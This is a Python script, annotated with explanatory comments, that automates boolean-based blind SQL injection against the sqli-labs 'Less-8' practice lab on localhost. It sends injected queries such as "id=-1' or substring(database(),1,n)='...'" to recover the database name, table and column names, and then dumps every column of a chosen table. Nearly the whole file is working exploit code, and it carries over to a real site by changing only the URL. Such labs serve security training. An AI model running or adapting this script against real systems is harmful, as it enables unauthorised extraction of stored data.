# Base URL of the sqli-labs "Less-8" exercise served from the local machine.
# Every probe below is built by string-appending a query string to this value
# and handing the result to requests.get() unchanged (no URL encoding is done
# here). Defined above the imports, which is unconventional but harmless.
url="http://localhost/sqli-labs-php7/Less-8/"
import string
import requests
def dblength():
    """Return the length of the current database name.

    Sends one request per candidate length in 1..99 and looks for the lab
    page's true-condition marker "You are in..........." in the body. The
    page therefore leaks exactly one bit per request, which is the whole
    mechanism this file relies on; the same marker is used by every other
    function here.

    Returns:
        The first i in 1..99 whose probe produced the marker.

    Raises:
        UnboundLocalError: if no probe matches, because ``length`` is only
        assigned inside the ``if``.
    """
    for i in range (1,100):
        payload=url+"?id=-1'or length(database())="+str(i)+"-- -"
        r=requests.get(payload)
        response=r.content.decode('utf-8')
        if "You are in..........." in response:
            length=i
            break
    return length
    # Unreachable: both prints sit after the return. Their placement inside
    # the function is inferred from the flattened original (at module level
    # they would raise NameError on import).
    print(i)
    print(payload)
def dbname(length):
    """Recover the database name one character at a time.

    For each position j, every character of ``string.printable`` is tried
    as the next character of the prefix recovered so far; the truth marker
    in the response confirms a guess. Each confirmed character costs up to
    ``len(string.printable)`` requests.

    Args:
        length: number of characters to recover (the value from dblength()).

    Returns:
        The recovered name. A position with no matching candidate is
        silently skipped, so the result can be shorter than ``length`` and
        every later comparison then uses a too-short prefix.
    """
    s=""
    for j in range(1,length+1):
        for k in string.printable:
            payload=url+"?id=-1'or substring(database(),1,"+str(j)+")="+"'"+s+k+"'"+"-- -"
            print(payload)
            r=requests.get(payload)
            response=r.content.decode('utf-8')
            if "You are in..........." in response:
                s=s+k
                break
    return s
def tablelen():
    """Return the length of the comma-joined list of table names.

    Reads the module-level ``database_name``, which is assigned by the
    driver code at the bottom of the file after dbname() runs; calling this
    earlier raises NameError.

    Returns:
        The matched length, or 99 when no probe in 1..99 matched, because
        ``table_length`` takes whatever value the loop variable ends with.
    """
    for i in range(1,100):
        payload=url+"?id=-1' or length((select group_concat(table_name)from information_schema.tables where table_schema="+"'"+database_name+"'"+"))="+str(i)+"-- -"
        print (payload)
        r=requests.get(payload)
        response=r.content.decode('utf-8')
        if "You are in..........." in response:
            break
    # Placement inferred from the flattened original; whether this line sits
    # inside or after the loop, the returned value is the same.
    table_length=i
    return table_length
def table_details():
    """Recover the comma-joined table names, one confirmed character per position.

    Same prefix-extension scheme as dbname(), applied to the joined list of
    table names. Reads the module-level ``database_name`` and
    ``table_length``, both set by the driver code before this is called.

    Returns:
        The recovered string (also printed); the caller splits it on ",".
    """
    s=""
    for i in range(1,table_length+1):
        for j in string.printable:
            payload=url+"?id=-1' or substring((select group_concat(table_name)from information_schema.tables where table_schema="+"'"+database_name+"'),1,"+str(i)+")='"+s+j+"'"+"-- -"
            print(payload)
            r=requests.get(payload)
            response=r.content.decode('utf-8')
            if "You are in..........." in response:
                s=s+j
                break
    print(s)
    return s
def column_length():
    """Return, for each entry of ``table_names``, the length of its joined column list.

    Reads the module-level ``table_names``.

    Returns:
        A list meant to be index-aligned with ``table_names``. A table whose
        length is not matched in 0..99 gets no entry, which shifts every
        later index; column_names() indexes this list by table position.
    """
    columns_length=[]
    l=len(table_names)
    for i in range(l):
        # Candidate range starts at 0 here, unlike the other probes.
        for j in range(100):
            payload=url+"?id=-1' or length((select group_concat(column_name)from information_schema.columns where table_name="+"'"+table_names[i]+"'"+"))="+str(j)+"-- -"
            print(payload)
            r=requests.get(payload)
            response=r.content.decode('utf-8')
            if "You are in..........." in response:
                columns_length.append(j)
                break
    return columns_length
def column_names():
    """Recover the joined column names for every table in ``table_names``.

    Reads the module-level ``table_names`` and ``columns_length``, which
    must be index-aligned (see column_length()).

    Returns:
        One comma-joined string per table, in ``table_names`` order; an
        empty string for any table whose characters never matched.
    """
    columns_name=[]
    s=""
    for i in range(len(table_names)):
        # Reset per table; the assignment above the loop is redundant.
        s=""
        for j in range(1,columns_length[i]+1):
            for k in string.printable:
                payload=url+"?id=-1' or substring((select group_concat(column_name)from information_schema.columns where table_name="+"'"+table_names[i]+"'),1,"+str(j)+")='"+s+k+"'"+"-- -"
                print(payload)
                r=requests.get(payload)
                response=r.content.decode('utf-8')
                if "You are in..........." in response:
                    s=s+k
                    break
        columns_name.append(s)
    return columns_name
def info_data():
    """Read every column of one table chosen interactively.

    Prompts for an index into the module-level ``table_names`` and
    ``columns_name``; there is no bounds check, so an out-of-range index
    raises IndexError and non-numeric input raises ValueError. The first
    pass measures each column's joined length (candidates 1..999), the
    second pass recovers each column's joined contents with the same
    prefix-extension scheme as the other functions.

    Returns:
        ``(data_dumb, info_length)``: the recovered strings and their
        lengths, in column order. A column with no length match below 1000
        gets no ``info_length`` entry, so the second pass then pairs later
        lengths with the wrong column names.
    """
    info_length=[]
    data_dumb=[]
    n=int(input("input the number of table to dump"))
    # Misspelling of single_column; assigned and never read.
    singe_column=[]
    single_column=columns_name[n].split(",")
    for i in range(len(single_column)):
        for j in range(1,1000):
            payload=url+"?id=-1' or length((select group_concat("+single_column[i]+") from "+table_names[n]+"))="+str(j)+"-- -"
            print(payload)
            r=requests.get(payload)
            response=r.content.decode('utf-8')
            if "You are in..........." in response:
                info_length.append(j)
                break
    for k in range(len(info_length)):
        s=""
        for l in range(1,info_length[k]+1):
            for m in string.printable:
                payload=url+"?id=-1' or substring((select group_concat("+single_column[k]+")from "+table_names[n]+"),1,"+str(l)+")='"+s+m+"'-- -"
                print(payload)
                r=requests.get(payload)
                response=r.content.decode('utf-8')
                if "You are in..........." in response:
                    s=s+m
                    break
        data_dumb.append(s)
    return (data_dumb,info_length)
# Driver. Each function above reads module-level names assigned here at call
# time (database_name, table_length, table_names, columns_length,
# columns_name), so the order of these statements is load-bearing and the
# script only works when run as a whole, not when imported.
#
# Seen from the server side, a run is one long burst of GETs to the same
# path whose query strings differ by a single integer or character and
# that repeatedly reference information_schema; that regularity, not any
# single request, is what request logging or a WAF rule would key on.
length=dblength()
database_name=dbname(length)
table_length=tablelen()
# Immediately overwritten by the split on the next line.
table_names=[]
table_names=table_details().split(",")
columns_length=column_length()
columns_name=column_names()
print("table name found",table_names)
# Blocks on input() for the table index before the summary below.
data_dumb,info_length=info_data()
print("database length found",length)
print("database name found",database_name)
print("table length found",table_length)
print("tables name found",table_names)
print("column lengths found",columns_length)
print("column name found",columns_name)
print("data length found for given table",info_length)
print("data found from given table",data_dumb)